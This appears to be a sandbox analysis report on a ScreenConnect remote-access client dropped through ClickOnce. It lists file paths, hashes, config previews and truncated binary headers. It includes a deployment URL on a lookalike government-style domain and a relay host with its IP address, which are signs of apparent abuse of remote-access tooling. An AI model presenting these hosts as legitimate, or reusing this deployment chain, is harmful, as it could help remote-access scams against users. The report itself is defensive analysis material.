Preview:	...........lSystem.Resources.ResourceReader, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089#System.Resources.RuntimeResourceSet............PADPADP)...s^.J.....E.....(....jF.C...1P)...H..../..72J..I.J.a.K8c._.ks`.k.`.kK..m.M6p............b...P...........'...!...............K...............w.......P.......1......."A.p.p.l.i.c.a.t.i.o.n.I.c.o.n.1.6.....$A.p.p.l.i.c.a.t.i.o.n.I.c.o.n.2.5.6....."A.p.p.l.i.c.a.t.i.o.n.I.c.o.n.3.2....."A.p.p.l.i.c.a.t.i.o.n.I.c.o.n.4.8.....,A.p.p.l.i.c.a.t.i.o.n.I.c.o.n.B.l.a.n.k.1.6.;...(A.p.p.l.i.c.a.t.i.o.n.I.c.o.n.M.a.c.2.2.....0A.p.p.l.i.c.a.t.i.o.n.I.c.o.n.O.p.a.q.u.e.1.9.2.8...,A.p.p.l.i.c.a.t.i.o.n.I.c.o.n.T.i.t.l.e.1.6.....6B.l.a.n.k.M.o.n.i.t.o.r.B.a.c.k.g.r.o.u.n.d.C.o.l.o.r.4...6B.l.a.n.k.M.o.n.i.t.o.r.B.a.c.k.g.r.o.u.n.d.I.m.a.g.e.:...DB.l.a.n.k.M.o.n.i.t.o.r.B.a.c.k.g.r.o.u.n.d.I.m.a.g.e.V.i.s.i.b.l.e.xb..B.l.a.n.k.M.o.n.i.t.o.r.T.e.x.t.C.o.l.o.r..b..D.a.r.k.T.h.e.m.e.B.a.r.B.a.s.e.C.o.l.o.r..b..<D.a.r.k.T.h.

C:\Users\user\AppData\Local\Apps\2.0\22K7YDEL.EJG\CAEPJ7Q4.XND\scre..tion_25b0fbb6ef7eb094_0018.0003_394c92efd29e09fe\app.config

Download File

Process:	C:\Users\user\AppData\Local\Apps\2.0\22K7YDEL.EJG\CAEPJ7Q4.XND\scre..tion_25b0fbb6ef7eb094_0018.0003_394c92efd29e09fe\ScreenConnect.WindowsClient.exe
File Type:	XML 1.0 document, ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	1970
Entropy (8bit):	4.690426481732819
Encrypted:	false
SSDEEP:	48:OhMOdH55AfdH85AfdHfh/dH8h/dHmh/dHH/dHS/dH0/dHjdH6dH/dHAdHKdH3dHX:o3H52H82HzHAHyHVHeHMHZHUH1HyHkHN
MD5:	2744E91BB44E575AD8E147E06F8199E3
SHA1:	6795C6B8F0F2DC6D8BD39F9CF971BAB81556B290
SHA-256:	805E6E9447A4838D874D84E6B2CDFF93723641B06726D8EE58D51E8B651CD226
SHA-512:	586EDC48A71FA17CDF092A95D27FCE2341C023B8EA4D93FA2C86CA9B3B3E056FD69BD3644EDBAD1224297BCE9646419036EA442C93778985F839E14776F51498
Malicious:	false
Preview:	<?xml version="1.0"?>..<configuration>.. <configSections>.. <section name="ScreenConnect.ApplicationSettings" type="System.Configuration.ClientSettingsSection" />.. </configSections>.. <ScreenConnect.ApplicationSettings>.. <setting name="ShowFeedbackSurveyForm" serializeAs="String">.. <value>false</value>.. </setting>.. <setting name="SupportShowUnderControlBanner" serializeAs="String">.. <value>false</value>.. </setting>.. <setting name="AccessShowUnderControlBanner" serializeAs="String">.. <value>false</value>.. </setting>.. <setting name="SupportHideWallpaperOnConnect" serializeAs="String">.. <value>false</value>.. </setting>.. <setting name="AccessHideWallpaperOnConnect" serializeAs="String">.. <value>false</value>.. </setting>.. <setting name="HideWallpaperOnConnect" serializeAs="String">.. <value>false</value>.. </setting>.. <setting name="SupportShowBalloonOnConnect" serializeAs="String">.. <value>fa

C:\Users\user\AppData\Local\Apps\2.0\22K7YDEL.EJG\CAEPJ7Q4.XND\scre..tion_25b0fbb6ef7eb094_0018.0003_394c92efd29e09fe\swyfmfmn.newcfg

Download File

Process:	C:\Users\user\AppData\Local\Apps\2.0\22K7YDEL.EJG\CAEPJ7Q4.XND\scre..tion_25b0fbb6ef7eb094_0018.0003_394c92efd29e09fe\ScreenConnect.ClientService.exe
File Type:	XML 1.0 document, ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	563
Entropy (8bit):	5.0293069247766855
Encrypted:	false
SSDEEP:	12:TMHdGGqq9yAas26K9YG6DLI4MWiNuGEAaORnYPENO/SxvSGSbCD0/vXbAa3xT:2dL9hK6E46YP8gGSa6vH
MD5:	8975A2DB9D3613CA73F282C2EA33956C
SHA1:	BEAE1D71A6460461543EF10CDCC92669D752B5B6
SHA-256:	A5048210BA8443ACF1C25CCDEABE57C16E383E5FEF12480B2135A41C846F6653
SHA-512:	063014593A0958B0732A256CCBC91E6CAE17CA6E8DA706BCB4E19DF1517D4C7092ABF755249E2C82A56019AB0519FFB1ED8A71E90BE8D2943CB8867F37B87376
Malicious:	false
Preview:	<?xml version="1.0" encoding="utf-8"?>..<configuration>.. <configSections>.. <section name="ScreenConnect.ApplicationSettings" type="System.Configuration.ClientSettingsSection, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089" />.. </configSections>.. <ScreenConnect.ApplicationSettings>.. <setting name="HostToAddressMap" serializeAs="String">.. <value>api.wisescreen.net=185.49.126.73-13%2f11%2f2024%2017%3a18%3a26</value>.. </setting>.. </ScreenConnect.ApplicationSettings>..</configuration>

C:\Users\user\AppData\Local\Apps\2.0\22K7YDEL.EJG\CAEPJ7Q4.XND\scre..tion_25b0fbb6ef7eb094_0018.0003_394c92efd29e09fe\user.config (copy)

Download File

Process:	C:\Users\user\AppData\Local\Apps\2.0\22K7YDEL.EJG\CAEPJ7Q4.XND\scre..tion_25b0fbb6ef7eb094_0018.0003_394c92efd29e09fe\ScreenConnect.ClientService.exe
File Type:	XML 1.0 document, ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	563
Entropy (8bit):	5.0293069247766855
Encrypted:	false
SSDEEP:	12:TMHdGGqq9yAas26K9YG6DLI4MWiNuGEAaORnYPENO/SxvSGSbCD0/vXbAa3xT:2dL9hK6E46YP8gGSa6vH
MD5:	8975A2DB9D3613CA73F282C2EA33956C
SHA1:	BEAE1D71A6460461543EF10CDCC92669D752B5B6
SHA-256:	A5048210BA8443ACF1C25CCDEABE57C16E383E5FEF12480B2135A41C846F6653
SHA-512:	063014593A0958B0732A256CCBC91E6CAE17CA6E8DA706BCB4E19DF1517D4C7092ABF755249E2C82A56019AB0519FFB1ED8A71E90BE8D2943CB8867F37B87376
Malicious:	false
Preview:	<?xml version="1.0" encoding="utf-8"?>..<configuration>.. <configSections>.. <section name="ScreenConnect.ApplicationSettings" type="System.Configuration.ClientSettingsSection, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089" />.. </configSections>.. <ScreenConnect.ApplicationSettings>.. <setting name="HostToAddressMap" serializeAs="String">.. <value>api.wisescreen.net=185.49.126.73-13%2f11%2f2024%2017%3a18%3a26</value>.. </setting>.. </ScreenConnect.ApplicationSettings>..</configuration>

C:\Users\user\AppData\Local\Apps\2.0\22K7YDEL.EJG\CAEPJ7Q4.XND\scre..vice_4b14c015c87c1ad8_0018.0003_none_04888a4494511071\ScreenConnect.ClientService.dll

Download File

Process:	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	68096
Entropy (8bit):	6.06942231395039
Encrypted:	false
SSDEEP:	1536:+A0ZscQ5V6TsQqoSD6h6+39QFVIl1zJhb8gq:p0Zy3gUOQFVQzJq
MD5:	5DB908C12D6E768081BCED0E165E36F8
SHA1:	F2D3160F15CFD0989091249A61132A369E44DEA4
SHA-256:	FD5818DCDF5FC76316B8F7F96630EC66BB1CB5B5A8127CF300E5842F2C74FFCA
SHA-512:	8400486CADB7C07C08338D8876BC14083B6F7DE8A8237F4FE866F4659139ACC0B587EB89289D281106E5BAF70187B3B5E86502A2E340113258F03994D959328D
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...nu............" ..0.............. ... ...@....... ..............................p.....@.................................e ..O....@.......................`..........8............................................ ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B................. ......H........n..@...................<.........................................(....^.(...........%...}....:.(......}....:.(......}....:.(......}.....~,...%-.&~+.....i...s....%.,...(...+vs....%.}P.........s....(....*....0...........s....}.....s....}...........}.......(&.....}.....(....&.()..........s....o.....()...~-...%-.&~+.....j...s....%.-...o ....s!...}.....s"...}.....s#...}...... .... 0u.........s....s=...}....... ..6........s....s=...}.....('...($............o%........

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\ScreenConnect.WindowsClient.exe.log

Download File

Process:	C:\Users\user\AppData\Local\Apps\2.0\22K7YDEL.EJG\CAEPJ7Q4.XND\scre..tion_25b0fbb6ef7eb094_0018.0003_394c92efd29e09fe\ScreenConnect.WindowsClient.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	1373
Entropy (8bit):	5.369201792577388
Encrypted:	false
SSDEEP:	24:ML9E4KQ71qE4GIs0E4KaXE4qpAE4KKUNKKDE4KGKZI6KhPKIE4TKBGKoM:MxHKQ71qHGIs0HKEHmAHKKkKYHKGSI65
MD5:	1BF0A215F1599E3CEC10004DF6F37304
SHA1:	169E7E91AC3D25D07050284BB9A01CCC20159DE7
SHA-256:	D9D84A2280B6D61D60868F69899C549FA6E4536F83785BD81A62C485C3C40DB9
SHA-512:	68EE38EA384C8C5D9051C59A152367FA5E8F0B08EB48AA0CE16BCE2D2B31003A25CD72A4CF465E6B926155119DAB5775A57B6A6058B9E44C91BCED1ACCB086DB
Malicious:	false
Preview:	1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System\b187b7f31cee3e87b56c8edca55324e0\System.ni.dll",0..3,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Drawing\567ff6b0de7f9dcd8111001e94ab7cf6\System.Drawing.ni.dll",0..3,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Windows.Forms\2a7fffeef3976b2a6f273db66b1f0107\System.Windows.Forms.ni.dll",0..2,"System.Deployment, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Xml\db3df155ec9c0595b0198c4487f36ca1\System.Xml.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, Pu

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\dfsvc.exe.log

Download File

Process:	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
File Type:	ASCII text, with CRLF line terminators
Category:	modified
Size (bytes):	1662
Entropy (8bit):	5.368796786510097
Encrypted:	false
SSDEEP:	48:M1H2HKQ71qHGIs0HKGAHKKkKYHKGSI6oPtHTH+JHvHlu:gWq+wmj0qxqKkKYqGSI6oPtzHIPQ
MD5:	F133699E2DFF871CA4DC666762B5A7FF
SHA1:	185FC7D230FC1F8AFC9FC2CF4899B8FFD21BCC57
SHA-256:	9BA0C7AEE39ACD102F7F44D289F73D94E2FD0FCD6005A767CD63A74848F19FC7
SHA-512:	8140CDCE2B3B92BF901BD143BFC8FB4FE8F9677036631939D30099C7B2BB382F1267A435E1F5C019EFFFF666D7389F77B06610489D73694FA31D16BD04CAF20A
Malicious:	false
Preview:	1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Deployment, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System\b187b7f31cee3e87b56c8edca55324e0\System.ni.dll",0..3,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Drawing\567ff6b0de7f9dcd8111001e94ab7cf6\System.Drawing.ni.dll",0..3,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Windows.Forms\2a7fffeef3976b2a6f273db66b1f0107\System.Windows.Forms.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Xml\db3df155ec9c0595b0198c4487f36ca1\System.Xml.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, Pu

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\ScreenConnect.ClientService.exe.log

Download File

Process:	C:\Users\user\AppData\Local\Apps\2.0\22K7YDEL.EJG\CAEPJ7Q4.XND\scre..tion_25b0fbb6ef7eb094_0018.0003_394c92efd29e09fe\ScreenConnect.ClientService.exe
File Type:	CSV text
Category:	dropped
Size (bytes):	847
Entropy (8bit):	5.345615485833535
Encrypted:	false
SSDEEP:	24:ML9E4KlKDE4KhKiKhPKIE4oKNzKoZAE4KzeR:MxHKlYHKh3oPtHo6hAHKzeR
MD5:	EEEC189088CC5F1F69CEE62A3BE59EA2
SHA1:	250F25CE24458FC0C581FDDF59FAA26D557844C5
SHA-256:	5345D03A7E6C9436497BA4120DE1F941800F2522A21DE70CEA6DB1633D356E11
SHA-512:	2E017FD29A505BCAC78C659DE10E0D869C42CE3B057840680B23961DBCB1F82B1CC7094C87CEEB8FA14826C4D8CFED88DC647422A4A3FA36C4AAFD6430DAEFE5
Malicious:	false
Preview:	1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\2192b0d5aa4aa14486ae08118d3b9fcc\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\2062ed810929ec0e33254c02b0c61bb4\System.Xml.ni.dll",0..

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\4G48BYOD.log

Download File

Process:	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
File Type:	Unicode text, UTF-16, little-endian text, with very long lines (603), with CRLF line terminators
Category:	dropped
Size (bytes):	14722
Entropy (8bit):	3.8062975591095487
Encrypted:	false
SSDEEP:	96:t6BKLDo/dRdzeAO7B10iBBaOy0lzEDo/dRdzeAO7B1irKYu/7LZ8YUkbYDo/dRdQ:E84ia638MruV8PKLEv
MD5:	7D71DD3851AFF3FB33A7EF8ECD48317F
SHA1:	6EEA3D74EDF6CF325286F758C16BE4648F399CFD
SHA-256:	F3BE2AAB4DB66C9707378C3DB5E8EB84189825CAB63662B0FF73150DDB4DA181
SHA-512:	17A7CD7B2FB5291A7CEC879ABCB884E79BA085A818C87E21897B874D7C689A357FA2ABBBD5B658F7B2B156DB24205F8F53ED0DECBCF33AB081C463C07374CFE9
Malicious:	false
Preview:	..P.L.A.T.F.O.R.M. .V.E.R.S.I.O.N. .I.N.F.O.......W.i.n.d.o.w.s. .......:. .1.0...0...1.9.0.4.5...0. .(.W.i.n.3.2.N.T.).......C.o.m.m.o.n. .L.a.n.g.u.a.g.e. .R.u.n.t.i.m.e. ...:. .4...0...3.0.3.1.9...4.2.0.0.0.......S.y.s.t.e.m...D.e.p.l.o.y.m.e.n.t...d.l.l. .....:. .4...8...4.2.7.0...0. .b.u.i.l.t. .b.y.:. .N.E.T.4.8.R.E.L.1.L.A.S.T._.C.......c.l.r...d.l.l. .......:. .4...8...4.5.1.5...0. .b.u.i.l.t. .b.y.:. .N.E.T.4.8.R.E.L.1.L.A.S.T._.C.......d.f.d.l.l...d.l.l. .......:. .4...8...4.2.7.0...0. .b.u.i.l.t. .b.y.:. .N.E.T.4.8.R.E.L.1.L.A.S.T._.C.......d.f.s.h.i.m...d.l.l. .......:. .1.0...0...1.9.0.4.1...3.0.0.0.0. .(.W.i.n.B.u.i.l.d...1.6.0.1.0.1...0.8.0.0.).........S.O.U.R.C.E.S.......D.e.p.l.o.y.m.e.n.t. .u.r.l.......:. .h.t.t.p.s.:././.c.l.o.u.d.-.s.s.a.g.o.v...i.c.u./.B.i.n./.S.c.r.e.e.n.C.o.n.n.e.c.t...C.l.i.e.n.t...a.p.p.l.i.c.a.t.i.o.n.?.e.=.S.u.p.p.o.r.t.&.y.=.G.u.e.s.t.&.h.=.a.p.i...w.i.s.e.s.c.r.e.e.n...n.e.t.&.p.=.8.0.4.1.&.s.=.9.2.9.8.e.1.6.8.-.a.0.c.f.-.4.8.8.d.-.9.5.4.c.

C:\Users\user\AppData\Local\Temp\Deployment\2XDPXGRC.BVT\VOVKCXWL.1NK.application

Download File

Process:	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
File Type:	XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with very long lines (63849), with CRLF line terminators
Category:	dropped
Size (bytes):	117161
Entropy (8bit):	5.583971122293747
Encrypted:	false
SSDEEP:	3072:xNIcT51/FXvMVNWfCXq9ym7m2o9HuzhJOvP:gcfiVIpmt8vOvP
MD5:	FE06C5E9C53AB451368667D3E3B1504B
SHA1:	7C76334BB2BC0D1E444A1FCAA484B642572CAD1E
SHA-256:	89EB055F32184DFE333494A271ED865958D5ADC1521043C6D81098F541CC0B3F
SHA-512:	B0C6570F937582B1072491506992AD077BD271B7301C26624A9418BAF77BBE5496D30EF3522D63D60EF8BEECC2CA113788B4A91833B99D931C841BAC0D051CAA
Malicious:	false
Preview:	.<?xml version="1.0" encoding="utf-8"?><asmv1:assembly xsi:schemaLocation="urn:schemas-microsoft-com:asm.v1 assembly.adaptive.xsd" manifestVersion="1.0" xmlns:asmv1="urn:schemas-microsoft-com:asm.v1" xmlns="urn:schemas-microsoft-com:asm.v2" xmlns:asmv2="urn:schemas-microsoft-com:asm.v2" xmlns:xrml="urn:mpeg:mpeg21:2003:01-REL-R-NS" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:asmv3="urn:schemas-microsoft-com:asm.v3" xmlns:dsig="http://www.w3.org/2000/09/xmldsig#" xmlns:co.v1="urn:schemas-microsoft-com:clickonce.v1" xmlns:co.v2="urn:schemas-microsoft-com:clickonce.v2">.. <assemblyIdentity name="ScreenConnect.WindowsClient.application" version="24.3.7.9067" publicKeyToken="25b0fbb6ef7eb094" language="neutral" processorArchitecture="msil" xmlns="urn:schemas-microsoft-com:asm.v1" />.. <description asmv2:publisher="ScreenConnect Software" asmv2:product="ScreenConnect Client" xmlns="urn:schemas-microsoft-com:asm.v1" />.. <deployment install="false" trustURLParameters="tru

C:\Users\user\AppData\Local\Temp\Deployment\9KAKXV2D.XK6\6ABM8A2B.QOV\ScreenConnect.Client.dll

Download File

Process:	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	197120
Entropy (8bit):	6.586775768189165
Encrypted:	false
SSDEEP:	3072:/xLtNGTlIyS7/ObjusqVFJRJcyzvYqSmzDvJXYF:FtNGTGySabqPJYbqSmG
MD5:	3724F06F3422F4E42B41E23ACB39B152
SHA1:	1220987627782D3C3397D4ABF01AC3777999E01C
SHA-256:	EA0A545F40FF491D02172228C1A39AE68344C4340A6094486A47BE746952E64F
SHA-512:	509D9A32179A700AD76471B4CD094B8EB6D5D4AE7AD15B20FD76C482ED6D68F44693FC36BCB3999DA9346AE9E43375CD8FE02B61EDEABE4E78C4E2E44BF71D42
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L................" ..0.................. ... ....... .......................`......#.....@.................................A...O.... ..\|....................@..........8............................................ ............... ..H............text........ ...................... ..`.rsrc...\|.... ......................@..@.reloc.......@......................@..B................u.......H...........4............_...... .........................................(......(....^.(...........%...}....:.(......}....:.(......}....:.(......}......{....:.(......}.....0..A........(....s....%.~(...%-.&~'.....y...s....%.(...(...+(...+o"...o........0..s.......~#.....2. ....+...j..... ......... ...............%.r...p.%.r...p............%.&...($....5..............s%....=.....0...........~...%-.&~).....\|...s&...%....(...+..~+...%-.&~).....}...s(...%.+...(...+.r9..

C:\Users\user\AppData\Local\Temp\Deployment\9KAKXV2D.XK6\6ABM8A2B.QOV\ScreenConnect.Client.dll.genman

Download File

Process:	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
File Type:	XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
Category:	dropped
Size (bytes):	1039
Entropy (8bit):	5.151589954158412
Encrypted:	false
SSDEEP:	24:JdFYZ8h9onRigeP0AQ6vSkcyMQgcVSkTo:3FYZ8h9oYgI0AQWHMQgGTo
MD5:	618DC5F6C85A2057BC7A86C5F498E2F1
SHA1:	5073B2C3A117985E8F26ED5BEA8C93A5BB202EEA
SHA-256:	F1BF5014656D836A4C5C42E7ED67FF368D1706C41082E1E4F33ABF9CDA09D647
SHA-512:	A8ED838573EF9A4119A4D32335543EA5074250D47212068EF2C4B470A451EB0154BCEB8B3BF8B0722D4250122F6B5A196383576F715FD938D3CCB6CBDE7C2799
Malicious:	false
Preview:	.<?xml version="1.0" encoding="utf-8"?>..<assembly xmlns="urn:schemas-microsoft-com:asm.v1" manifestVersion="1.0" xmlns:asmv2="urn:schemas-microsoft-com:asm.v2" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xsi:schemaLocation="urn:schemas-microsoft-com:asm.v1 assembly.adaptive.xsd">.. <assemblyIdentity name="ScreenConnect.Client" processorArchitecture="msil" publicKeyToken="4B14C015C87C1AD8" version="24.3.7.9067" />.. <file name="ScreenConnect.Client.dll" />.. <dependency>.. <dependentAssembly>.. <assemblyIdentity name="mscorlib" publicKeyToken="b77a5c561934e089" version="2.0.0.0" />.. </dependentAssembly>.. </dependency>.. <dependency>.. <dependentAssembly>.. <assemblyIdentity name="ScreenConnect.Core" publicKeyToken="4b14c015c87c1ad8" version="24.3.7.9067" />.. </dependentAssembly>.. </dependency>.. <dependency>.. <dependentAssembly>.. <assemblyIdentity name="System" publicKeyToken="b77a5c561934e089" version="2.0.0.0" />.. </dependent

C:\Users\user\AppData\Local\Temp\Deployment\9KAKXV2D.XK6\6ABM8A2B.QOV\ScreenConnect.ClientService.dll

Download File

Process:	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	68096
Entropy (8bit):	6.06942231395039
Encrypted:	false
SSDEEP:	1536:+A0ZscQ5V6TsQqoSD6h6+39QFVIl1zJhb8gq:p0Zy3gUOQFVQzJq
MD5:	5DB908C12D6E768081BCED0E165E36F8
SHA1:	F2D3160F15CFD0989091249A61132A369E44DEA4
SHA-256:	FD5818DCDF5FC76316B8F7F96630EC66BB1CB5B5A8127CF300E5842F2C74FFCA
SHA-512:	8400486CADB7C07C08338D8876BC14083B6F7DE8A8237F4FE866F4659139ACC0B587EB89289D281106E5BAF70187B3B5E86502A2E340113258F03994D959328D
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...nu............" ..0.............. ... ...@....... ..............................p.....@.................................e ..O....@.......................`..........8............................................ ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B................. ......H........n..@...................<.........................................(....^.(...........%...}....:.(......}....:.(......}....:.(......}.....~,...%-.&~+.....i...s....%.,...(...+vs....%.}P.........s....(....*....0...........s....}.....s....}...........}.......(&.....}.....(....&.()..........s....o.....()...~-...%-.&~+.....j...s....%.-...o ....s!...}.....s"...}.....s#...}...... .... 0u.........s....s=...}....... ..6........s....s=...}.....('...($............o%........

C:\Users\user\AppData\Local\Temp\Deployment\9KAKXV2D.XK6\6ABM8A2B.QOV\ScreenConnect.ClientService.dll.genman

Download File

Process:	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
File Type:	XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
Category:	dropped
Size (bytes):	1632
Entropy (8bit):	5.089918322084496
Encrypted:	false
SSDEEP:	48:3FYZ8h9o9gI0AQGCHMQgTMQg3MQgGAXTo:1YiW0AQQQ9QvQyc
MD5:	4E77158D54337B51A6368D7D094397C4
SHA1:	3A029B30B95786ADF97FB3C0B1C37B11154E0344
SHA-256:	276B0232A7C76292D34207F916966EA1BCD5CD7E1E1D9A2751C663F06E45B63C
SHA-512:	69D7A90B2802575555E68991D157885253A72F5ED5181AF5795E52BB6165B979542F482BAC1E3CC164013133A4B812E1EC10BBCD39AA1166318099ABC267ED95
Malicious:	false
Preview:	.<?xml version="1.0" encoding="utf-8"?>..<assembly xmlns="urn:schemas-microsoft-com:asm.v1" manifestVersion="1.0" xmlns:asmv2="urn:schemas-microsoft-com:asm.v2" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xsi:schemaLocation="urn:schemas-microsoft-com:asm.v1 assembly.adaptive.xsd">.. <assemblyIdentity name="ScreenConnect.ClientService" processorArchitecture="msil" publicKeyToken="4B14C015C87C1AD8" version="24.3.7.9067" />.. <file name="ScreenConnect.ClientService.dll" />.. <dependency>.. <dependentAssembly>.. <assemblyIdentity name="mscorlib" publicKeyToken="b77a5c561934e089" version="2.0.0.0" />.. </dependentAssembly>.. </dependency>.. <dependency>.. <dependentAssembly>.. <assemblyIdentity name="ScreenConnect.Core" publicKeyToken="4b14c015c87c1ad8" version="24.3.7.9067" />.. </dependentAssembly>.. </dependency>.. <dependency>.. <dependentAssembly>.. <assemblyIdentity name="ScreenConnect.Windows" publicKeyToken="4b14c015c87c1ad8" version=

C:\Users\user\AppData\Local\Temp\Deployment\9KAKXV2D.XK6\6ABM8A2B.QOV\ScreenConnect.ClientService.exe

Download File

Process:	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	95512
Entropy (8bit):	6.504684691533346
Encrypted:	false
SSDEEP:	1536:Eg1s9pgbNBAklbZfe2+zRVdHeDxGXAorrCnBsWBcd6myJkggU0HMx790K:dhbNDxZGXfdHrX7rAc6myJkggU0HqB
MD5:	75B21D04C69128A7230A0998086B61AA
SHA1:	244BD68A722CFE41D1F515F5E40C3742BE2B3D1D
SHA-256:	F1B5C000794F046259121C63ED37F9EFF0CFE1258588ECA6FD85E16D3922767E
SHA-512:	8D51B2CD5F21C211EB8FEA4B69DC9F91DFFA7BB004D9780C701DE35EAC616E02CA30EF3882D73412F7EAB1211C5AA908338F3FA10FDF05B110F62B8ECD9D24C2
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........(..qF.qF.qF....qF.....qF....qF.<.B.qF.<.E.qF.<.C.qF....qF.#..qF.qG..qF.2.O.qF.2...qF.2.D.qF.Rich.qF.........................PE..L.....wc...............!.............!............@.................................>)....@.................................p...x....`..P............L...)...p......`!..p............................ ..@............................................text...:........................... ..`.rdata...f.......h..................@..@.data........@.......,..............@....rsrc...P....`.......6..............@..@.reloc.......p.......<..............@..B........................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\Deployment\9KAKXV2D.XK6\6ABM8A2B.QOV\ScreenConnect.Core.dll

Download File

Process:	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	548864
Entropy (8bit):	6.034211651049746
Encrypted:	false
SSDEEP:	12288:xC2YKhQCNc6kVTplfWL/YTHUYCBdySISYz:HhE6O7WL/EC
MD5:	14E7489FFEBBB5A2EA500F796D881AD9
SHA1:	0323EE0E1FAA4AA0E33FB6C6147290AA71637EBD
SHA-256:	A2E9752DE49D18E885CBD61B29905983D44B4BC0379A244BFABDAA3188C01F0A
SHA-512:	2110113240B7D803D8271139E0A2439DBC86AE8719ECD8B132BBDA2520F22DC3F169598C8E966AC9C0A40E617219CB8FE8AAC674904F6A1AE92D4AC1E20627CD
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
